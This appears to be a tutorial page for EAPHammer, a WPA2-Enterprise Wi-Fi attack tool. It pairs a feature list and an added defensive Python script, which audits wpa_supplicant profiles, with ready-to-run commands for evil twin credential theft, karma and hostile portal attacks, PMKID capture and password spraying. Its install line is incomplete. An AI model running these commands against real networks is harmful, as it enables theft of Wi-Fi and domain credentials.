How to Install EAPHammer

EAPHammer: Attack WPA2-Enterprise networks

EAPHammer is a tool that was developed to test the security of WPA2-Enterprise networks. It was created by Gabriel Ryan (s0lst1c3) and is designed to exploit vulnerabilities in the Extensible Authentication Protocol (EAP), commonly used in enterprise Wi-Fi networks.

WPA2-Enterprise is a security protocol that provides more robust authentication and encryption mechanisms than the standard WPA2 used in home and small office networks. It relies on a RADIUS server for authentication, and EAP is the protocol used for communication between the client and the server.


Features

  • Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration is necessary for most attacks
  • No manual configuration is necessary for the installation and setup process
  • Leverages the latest version of hostapd (2.8)
  • Support for evil twin and karma attacks
  • Generate timed PowerShell payloads for indirect wireless pivots
  • Integrated HTTP server for hostile portal attacks
  • Support for SSID cloaking
  • Fast and automated PMKID attacks against PSK networks using hcxtools
  • Password spraying across multiple usernames against a single ESSID


To show how quick this tool is, our Quick Start section gives an example of how to carry out a credential-theft evil twin attack against a WPA/2-EAP network using only commands.

EAPHammer leverages a technique called “EAP Downgrade Attack” to force clients to use weaker EAP methods, such as EAP-MD5 or EAP-LEAP, instead of the more secure EAP methods like EAP-TLS or PEAP. By downgrading the authentication method, the attacker can then attempt to exploit vulnerabilities in the weaker EAP methods to gain unauthorized access to the network.
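On the defensive side, the evil twin credential theft and EAP downgrade described above depend on clients that accept a weak EAP method or do not validate the RADIUS server's certificate. The following added example (not from the original page or the EAPHammer project) audits a wpa_supplicant configuration for those client-side gaps; the sample profiles, file path, server name and the `parse_networks`/`audit` helper names are constructed for illustration.

```python
import re

# Downgrade targets named on the page; wpa_supplicant keys that pin the server name.
WEAK_EAP = {"MD5", "LEAP"}
NAME_CHECKS = ("domain_suffix_match", "domain_match", "subject_match", "altsubject_match")
# Constructed sample config (not from the page): one exposed profile, one hardened.
SAMPLE_CONF = '''
network={
    ssid="CompanyXYZ-legacy"
    key_mgmt=WPA-EAP
    eap=PEAP LEAP
}
network={
    ssid="CompanyXYZ"
    key_mgmt=WPA-EAP
    eap=TLS
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.corp.example"
}
'''

def parse_networks(conf_text):
    """Yield one {key: value} dict per network={...} block."""
    for body in re.findall(r"network\s*=\s*\{(.*?)\n\s*\}", conf_text, re.S):
        net = {}
        for line in body.splitlines():
            key, sep, value = line.strip().partition("=")
            if sep and not key.startswith("#"):
                net[key.strip()] = value.strip().strip('"')
        yield net

def audit(conf_text):
    """Return {ssid: [findings]} for every WPA-EAP profile in the config."""
    report = {}
    for net in parse_networks(conf_text):
        if not any(t.startswith("WPA-EAP") for t in net.get("key_mgmt", "").split()):
            continue
        methods = set(net.get("eap", "").upper().split())
        findings = [f"weak EAP method allowed: {m}" for m in sorted(methods & WEAK_EAP)]
        if not methods:
            findings.append("eap unset: all compiled-in methods are allowed")
        if "ca_cert" not in net and "ca_path" not in net:
            findings.append("no ca_cert/ca_path: server certificate is not verified")
        if not any(k in net for k in NAME_CHECKS):
            findings.append("no server name match: any certificate under the trusted CA is accepted")
        report[net.get("ssid", "<no ssid>")] = findings
    return report

if __name__ == "__main__":
    print(audit(SAMPLE_CONF))
```

An empty findings list means the profile restricts EAP methods and pins both the CA and the server name; profiles without WPA-EAP key management are skipped.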

How to Install EAPHammer

git clone

Generate EAPHammer Certificates

./eaphammer --cert-wizard

Credential Theft Evil Twin Attack

./eaphammer -i wlan0 --channel 5 --auth wpa-eap --essid OffWifi --creds

Karma attacks

./eaphammer -i wlan0 --essid offwifi --cloaking full -c 7 --auth open --hostile-portal --karma

PMKID Attacks

./eaphammer --pmkid --interface wlan0 --bssid fc:ad:83:77:fe:ab --channel 10

ESSID Cloaking

./eaphammer -i wlan0 -e CompanyXYZ -c 1 --auth open --hostile-portal --cloaking full

Captive Portal Attacks

./eaphammer --bssid fc:ad:83:77:fe:ab --essid CompanyXYZ --channel 149 --interface wlan0 --captive-portal

Password Spraying

./eaphammer --eap-spray --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 --essid CompanyXYZ --password qwerty1234 --user-list users.txt


It’s important to note that EAPHammer is an offensive security tool and should only be used in authorized and controlled environments for legitimate security testing purposes. Using it to attack networks without proper authorization is illegal and unethical.
